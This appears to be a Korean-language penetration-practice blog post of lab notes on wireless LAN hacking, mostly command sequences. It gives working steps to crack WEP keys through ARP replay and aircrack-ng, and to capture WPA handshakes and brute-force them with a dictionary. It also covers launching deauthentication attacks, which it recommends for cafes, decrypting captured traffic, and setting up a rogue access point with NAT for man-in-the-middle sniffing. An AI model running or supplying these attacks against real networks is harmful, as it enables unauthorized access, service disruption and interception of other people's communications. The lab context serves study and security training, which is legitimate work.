본문 바로가기
Penetration Practice/네트워크

무선 랜 해킹

by 6unoh 2019. 8. 14.

무선 랜 해킹

wlan이기 때문에 iwconfig로 wlan을 확인해야 한다

 

무선 ap로 접근하는 방법 wireless

-iwconfig명령어로 wlan을 관리가능하다

 

공유기 관리 페이지에서 인증 및 암호화에 암호화 없음

 

1.ifconfig wlan0 up을 해서 인터페이스를 켠다

2.iwlist wlan0 scan 명령어로 주변에 있는 ap을 스캔한다 APNET02를 찾는다

목록이 안나오고 결과가 없다고 나오는 경우 오른쪽 아래 usb를 disconnect하고 다시 업시키는 것을 될때 까지한다

3.ifconfig wlan0 down시킨다음

4.iwconfig wlan0 essid "APNET02"로 셋팅을 한다(찾은 AP를 essid로 셋팅) 다음 ifconfig wlan0 up한다

5.iwconfig의 access-point에 bssid가 나오면 정상 안나오면 2번 부터 다시한다

 


 

6.dhclient wlan0으로 ip를 받아온다

 

※무선 랜 관리페이지

최적 채널 1,6,11번 혼선이 적게 일어난다

인증 및 암호화 같이 일어나게 됨

 

 

 

모니터링으로 바꾸는 것

1.airmon-ng start wlan0 - 모니터링 인터페이스를 가상으로 만들어 활성화 한다

-프로세스가 켜져있으면 프로세스를 죽이고 시작한다

kill -9 [프로세스 번호]

모니터링 인터페이스 지우는 법

airmon-ng stop mon[번호]

 

2.iwconfig로 mon인터페이스가 활성화 된것을 확인한다

3.wireshark로 mon인터페이스를 잡는다

4.ifconfig wlan0 down

5.iwconfig wlan0 essid "APNET02" , ifconfig wlan0 up

6.filtering으로 wlan.addr==mac주소 로 확인해본다

확인 과정

 

 

패킷의 프레임을 보면

알고리즘이 오픈되어져 있다

 

 

 

2. 이번에는 암호화를 개방모드+WEP

1.iwconfig wlan0 key s:apnet 암호 비밀번호를 넣어준다

나머지는 위와 동일하게 한다

위의 과정과 동일하게 오픈되어져있다


 

2. 암호화를 공유모드+WEP

처음에는 페이크 인증 등이라 불리는 인증을 한번 거치고 난 뒤

 

알고리즘이 shared key로 바뀌고

challenge text라고 해서 이것을 평문으로 보낸 뒤 복호화를 해 같은 텍스트가 나오면 인증이 성공된 것이라 여긴다

평문으로 보내기 때문에 취약할 수 있다

 

 

 

===========================================================================================

 

airmon-ng start wlan0으로 모니터링인터페이스를 활성화 시킨 후

vi /usr/local/etc/kismet.conf열고 아래처럼 ncsource를 모니터링 번호로 고쳐준다

kismet은 무선네트워크를 잡아주는 도구

kismet라고 치면

다 엔터로 치고 스타트 하고 close the window를 하면

이러한 화면이 나온다 만약 no networks seen이라고 하면서 아무것도 나오지 않으면

모니터링 인터페이스를 지우고 다시 켠다 kismet나가는 방법은 kismet에 나가기를 누르고 kill하면 된다

apnet02에 들어가보면

그래프가 보이고 해당무선네트워크의 정보들이 나온다

essid,bssid,channel,암호화방식을 알아내야 한다


key추출방법

1.모니터링 인터페이스를 활성화 시킨다

2.airodump-ng -c 11 --bssid [bssid] mon0[인터페이스] 

airodump-ng 이작업을 하는 이유

-채널을 잡으면 채널이 고정이된다

 

데이터 부분의 숫자가 올라가야한다

 

3.새 창에 aireplay-ng -1[fake authetication] 0 -e APNET02 -a [bssid] -h [bt wlan mac] mon0[인터페이]

aireplay-ng 패킷 유발하는 도구

AID:1이라고 나와야 한다

4.aireplay-ng -3 -b [bssid] -h [bt wlan mac] mon0[인터페이스]

최소5천개 최대 20만개의 패킷이 보일 때까지 arp request 패킷을 보내야 한다

 

5. 3번째 창에 airodump-ng -c 11 --bssid [bssid] --ivs -w [저장할 파일명] mon0[모니터링 인터페이스]

iv값을 추출해서 저장하기 위한 것이다

 

6.aircrack-ng -b [bssid] *.ivs[저장한 파일명] 

키를 찾는 과정이 나타나게 된다

  

 

 

deauthetication공격
-카페 등에서 쓰면 좋은 공격

 

모든 공격은 채널을 고정하고 시작한다

2.aireplay-ng -0 0[count] -a [bssid] mon0[모니터링 인터페이스] -c[목적지 mac]

-카운트는 0이상의 값을 적는다

-c를하면 특정 대상에게만 날라간다

만약 안되는 경우 옵션을 알려주는데 그 옵션을 적어주면 된다

 

wireshark에서 패킷확인하는 방법

wlan.fc.subtype==12 && wlan.fc.type==0&&wlan.addr==00:26:66:81:44:C0

 

현실적으로  방어할 방법이 없다 다만 무선 장비에서 deauthethication을 받지 않게 하는 것이

있지만 현실적으로 모든 장비하기 힘들다

 

probe request에 ssid를 알아온ㄷ

 

airodump-ng -c 11 --bssid 00:26:66:81:44:C0 mon0

aireplay-ng -1 0 -e APNET02 -a 00:26:66:81:44:C0 -h 00:26:66:03:f3:d8 mon0

aireplay-ng -3 -b 00:26:66:81:44:C0 -h 00:26:66:03:f3:d8 mon0

airodump-ng -c 11 --bssid 00:26:66:81:44:C0 --ivs -w wep_ivs mon0

aircrack-ng -b 00:26:66:81:44:C0 wep_ivs

 

bssid    64:e5:99:11:03:cc 1번채널 00:26:66:4d:d9:4b

 

 

 

wpa방식 해킹

wpa디렉터리 안에 wpa-supplicant.conf파일을 만들고

network={ 

ssid="APNET02" 

key_mgmt=WPA-PSK 

proto=WPA 

pairwise=TKIP 

group=TKIP 

psk="apnet002" 

network={ 

ssid="APNET02" 

key_mgmt=WPA-PSK

proto=WPA2 

pairwise=CCMP 

group=CCMP 

psk="apnet002" 

}

를 적는다

 

1.wlan0의 essid를 입력한 후

2.wpa_supplicat -Dwext -iwlan0 -c ./wpa_supplicant.conf

ap연결된것 확인하고 외부와 통신이 가능하다

 

=============================================================================

 

1.airodump-ng -c 6 --bssid 00:26:66:81:44:C0 mon0 으로 채널을 고정용으로 만든다

2.새 창에 airodump-ng -c 6 --bssid 00:26:66:81:44:C0 -w wpa mon0으로 wpa파일에 저장을한다

3.이후 ap에 누군가 접근을 하면 wpa handshake가 나오면 그과정에 대한 내용이 wpa파일로 저장된다

-접근하지 않으면 aircrack으로 다시접속하게 만든다

(aireplay-ng -0 10 -a bssid mon0)

4.vi dic.txt파일에 작성한다(딕셔너리 어택)

test1234

apnet123

apnet002

 

5.cowpatty -r wpa-01.cap -s APNET02[essid] -f dic.txt으로 공격한다

 

서로 통신하고 있는 것을 복호화해서 보는 방법
airdecap-ng -e APNET02 -p apnet002 wpa-01.cap 하면 복호화해서 보인다

wireshark에서 /wpa/wpa-01-dec.cap파일을 열면 다 보이게 된다

 

 

 

/etc/apt/sources.list에 있는 모든 것을 주석처리 하고

deb http://mirror.anl.gov/pub/ubuntu lucid main을 추가한다 

 


apt-get update한후

apt-get remove dhcp3*

apt-get install dhcp3-*

=======================================================================================

bouge ap

ap와 같은 랜카드를 ap로 만들어서 사용하는 것이다

MITM처럼 해서 AP의 passwd를 알아낼 필요없이 패킷분석이 가능하다

 

1.echo 1 > /proc/sys/net/ipv4/ip_forward

2./etc/dhcp3/dhcpd.conf파일을 만든다

subnet 172.16.10.0 netmask 255.255.255.0

{

    range    172.16.10.100    172.16.10.200; 

    option subnet-mask    255.255.255.0; 

    option    routers    172.16.10.1; 

    option    domain-name-servers    168.126.63.1; 

    option    broadcast-address    172.16.10.255;


}

3.모니터링 인터페이스 생성

4.airbase-ng(페이크 ap 생성)

-airbase-ng -e APNET025[essid] -c 5 mon0

at인터페이스가 생성된다(ifconfig -a)

at ip를  option    routers    172.16.10.1와 같이 한다

5.route add -net 172.16.10.0 netmask 255.255.255.0 gw 172.16.10.1 으로 네트워크 대역을 추가해 준다

6.iptables -A FORWARD -i eth0 -j ACCEPT

iptables -A FORWARD -i at0 -j ACCEPT 

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE 

로 라우팅을 해준다

7.service dhcp3-server start


'Penetration Practice > 네트워크' 카테고리의 다른 글

무선네트워크 및 WEP암호화  (0) 2019.08.14
하트블리드(heartbleed) 취약점 실습  (0) 2015.09.23
SSL MITM  (0) 2015.09.22
DNS Spoofing  (0) 2015.09.21
IP Spoofig  (0) 2015.09.17

댓글